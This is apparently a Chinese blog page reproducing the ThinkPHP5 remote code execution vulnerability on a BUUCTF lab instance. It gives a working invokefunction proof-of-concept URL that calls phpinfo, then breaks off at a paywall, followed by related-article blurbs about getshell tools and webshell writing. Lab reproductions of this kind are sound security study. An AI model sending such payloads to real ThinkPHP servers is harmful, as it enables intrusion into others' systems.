Thinkphp5 任意代码执行漏洞复现

最新推荐文章于 2025-09-15 16:29:51 发布

原创

最新推荐文章于 2025-09-15 16:29:51 发布 · 1.1k 阅读

4 ·

CC 4.0 BY-SA版权

文章标签：

#安全

本文介绍了一种利用ThinkPHP框架中的任意代码执行漏洞的方法。通过特定的URL参数调用系统函数，可以实现远程代码执行，包括查看服务器信息、执行系统命令及上传WebShell。

环境搭建

Github传送门
 BUU传送门

菜鸡懒得动手直接上buu一键搭建环境

http://node3.buuoj.cn:28078/

在这里插入图片描述

POC

首页已经提示thinkphp5了，笔者推荐一款比较好用的谷歌插件Wappalyzer
在这里插入图片描述
直接分析出使用了php7.2.31（但是不懂为啥没分析出thinkPHP框架）

直接百度thinkPHP任意代码执行漏洞
大佬博客传送门

poc：

http://node3.buuoj.cn:28078/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1    #执行phpinfo函数，

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

imbia

关注关注

1
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

thinkphp漏洞利用工具-thinkphp_gui_tools(三)

SuperherRo的博客

08-17

7504

ThinkPHP漏洞综合利用工具, 图形化界面, 命令执行, 一键getshell, 批量检测, 日志遍历, session包含,宝塔绕过

热门框架漏洞--ThinkPHP代码执行

jxy158212的博客

02-21

861

ThinkPHP是一个免费开源的，快速、简单的面向对象的轻量级PHP开发框架，是为了敏捷WEB应用开发和简化企业应用开发而诞生的ThinkPHP发展至今，核心版本主要有以下几个系列，ThinkPHP 2系列、ThinkPHP 3系列、ThinkPHP 5系列、ThinkPHP 6系列，各个系列之间在代码实现及功能方面，有较大区别。其中ThinkPHP 2以及ThinkPHP 3系列已经停止维护，ThinkPHP 5系列现使用最多，而ThinkPHP 3系列也积累了较多的历史用户。

参与评论您还未登录，请先登录后发表或查看评论

从0起步学习网络安全（学习篇）：DAY11 Web中间件漏洞之ThinkPHP漏洞

最新发布

Jiangbe-Boating

09-15

902

ThinkPHP是国内最流行的PHP框架之一，但存在多种高危漏洞，包括RCE、敏感信息泄露和本地文件包含等。文章介绍了框架特征识别方法，并详细复现了5.x RCE漏洞、敏感信息泄露漏洞和多语言文件包含漏洞的利用过程。针对这些漏洞，建议及时更新框架版本、加强代码审查、严格访问控制并定期进行安全检测。尽管官方已发布修复补丁，但仍有大量未更新系统面临风险。文章提供了完整的安全分析思路和修复方案，帮助开发者和运维人员提升系统安全性。

thinkphp3.2.x 代码执行

qq_23003811的博客

07-15

775

2、访问日志生成地址：/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/24_07_15.log，其中修改24_07_15为当天日期，解析phpinfo成功。该漏洞是在受影响的版本中，业务代码中如果模板赋值方法assign的第一个参数可控，则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径，造成任意文件包含，执行任意代码。1、构造payload：/index.php?

thinkphp任意代码执行漏洞

ytfhjhv的博客

11-11

3043

thinkphp任意代码执行漏洞

ThinkPHP V5.0.5漏洞_ThinkPhp5.0.x远程RCE复现

weixin_39975486的博客

11-19

1554

0x1 前言之前看到大佬们在网上爆出tp远程代码执行，我就想着来复现一波，所以写篇文章做个笔记。0x2漏洞复现首先去ThinkPhP官网下载他的一个框架：框架下载 - ThinkPHP框架www.thinkphp.cn在这里我选择的是ThinkPHP5.0.22完整版，大家可以下载其他版本！然后使用phpstudy集成环境搭建Tp5.0.22：然后运行php环境，在这里我选择的是Apach+PH...

ThinkPHP 5.0 远程代码执行漏洞分析

02-21

### ThinkPHP 5.0 远程代码执行漏洞分析 #### 漏洞背景与概述 ThinkPHP是一款广泛使用的PHP框架，它提供了丰富的功能和良好的性能。然而，如同任何复杂的软件系统一样，它也存在安全漏洞。本次分析的焦点集中在...

ThinkPHP 5.0.23 远程代码执行漏洞复现

Senimo

05-01

5723

ThinkPHP 5.0.23 远程代码执行一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接六、利用工具一、漏洞描述 ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中，获取 method 的方法中没有正确处理方法名，导致攻击者可以调用 Request 类任意方法并构造利用链，从而导致远程代码执行漏洞。二、漏洞影响 ThinkPHP <= 5.0.24 三、漏洞复现 1、环境搭建使用 Vulhub 在服务器上搭建

漏洞复现----38、ThinkPHP5 5.0.23 远程代码执行漏洞

七天

06-29

1805

ThinkPHP 5.0.23远程代码执行漏洞

ThinkPHP5 5.0.23-rce远程代码执行漏洞复现

qq_45079558的博客

09-08

546

其版本5中，由于框架对控制器名没有进行足够的检测，会导致在没有开启强制路由的情况下可执行任意方法，从而导致远程命令执行漏洞。通过echo命令写入 Webshell 文件,首先将一句话木马进行Base64 编码。判断是否存在漏洞：访问/index.php?s=captcha页面，会出现如下报错。切换目录到vulhub/thinkphp/5.0.23-rce下。使用HackBar 插件发送 POST 请求。端口为:8080,访问网站，搭建成功。访问shell.php，使用蚁剑连接。

任意代码执行漏洞

weixin_34144450的博客

07-25

526

0x00 什么是任意代码执行当应用在调用一些能将字符串转化成代码的函数（如PHP重的eval）时，没有考虑用户是否能控制这个字符串，将造成代码注入漏洞。狭义的代码注入通常指将可执行代码注入到当前页面中，如PHP的eval函数，可以将字符串代表的代码作为PHP代码执行，当用户能够控制这段字符串时，将产生代码注入漏洞（也称命令执行）。广义上的代码注入，可以覆盖大半安全漏洞的分类。...

thinkphp漏洞图形化综合利用工具

05-23

Thinkphp(GUI)漏洞综合利用工具，支持各版本TP漏洞检测，命令执行，getshell。 (如果感觉对您有帮助，感觉不错的话，请您给个大大的支持） JFormDesigner可视化编写，没有javafx可视化好用（建议学javafx）。检测不到的payload欢迎提交payload至issues。这个真的超级好用，推荐推荐

thinkphp 代码执行 (CNVD-2018-24942)

weixin_48900801的博客

07-29

468

thinkphp 代码执行 (CNVD-2018-24942) 漏洞介绍 ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测，攻击者利用该漏洞对目标网站进行远程命令执行攻击。影响版本： ThinkPHP 5.*，<5.1.31 ThinkPHP <=5.0.23 过程 1.开启靶场环境 2、在其地址增加路径与参数即可,最后是需要执行的命令 ls /tmp /index.php/?s=index/\think\app/invokefunction&fu

ThinkPHP 漏洞利用工具

Websec

05-18

7057

当看到ThinkPHP十年磨一剑的提示，那么今天这里分享的工具就可以派上用场了，一键检测ThinkPHP全版本漏洞。 01、TPscan 一键ThinkPHP漏洞检测，基于Python3，命令行检测，集成了14个常见的ThinkPHP框架漏洞检测插件。 github项目地址： https://github.com/Lucifer1993/TPscan 02、Aazhen-V3.1 支持ThinkPHP 2.x RCE，Thinkphp5 5.0.22/5.1.29RCE，ThinkPHP5

Thinkphp(GUI)漏洞利用工具，支持各版本TP漏洞检测，命令执行，Getshell

LiBai'S BLOG

08-13

672

Thinkphp(GUI)漏洞利用工具，支持各版本TP漏洞检测，命令执行，Getshell。JAVAFX可视化编写，博主第一次用javafx来写界面，第一次学习尝试，仅仅只用于学习尝试如果缺少什么payload，欢迎提交issues。根据大佬的项目二次更改 https://github.com/Lotus6/ThinkphpGUI持续更新中，有些bug没改，有空就更新。

thinkphp漏洞利用工具-ThinkphpGUI(一)

SuperherRo的博客

08-17

6518

Thinkphp(GUI)漏洞利用工具，支持各版本TP漏洞检测，命令执行，getshell。

thinkphp漏洞利用工具-ThinkphpGUI(二)

SuperherRo的博客

08-17

2038

thinkphp漏洞利用工具

thinkphp漏洞利用工具-ThinkphpGUI(一)，附下载链接。

白帽子黑客SuperherRo

09-23

903

Thinkphp(GUI)漏洞利用工具，支持各版本TP漏洞检测，命令执行，getshell。

thinkphp5文件包含漏洞复现

04-03

### ThinkPHP5 文件包含漏洞复现教程 #### 背景介绍 ThinkPHP 是一款流行的 PHP 开源框架，广泛应用于 Web 应用开发。然而，在某些特定条件下，该框架可能存在严重的安全漏洞。例如，当启用多语言功能或模板引擎未...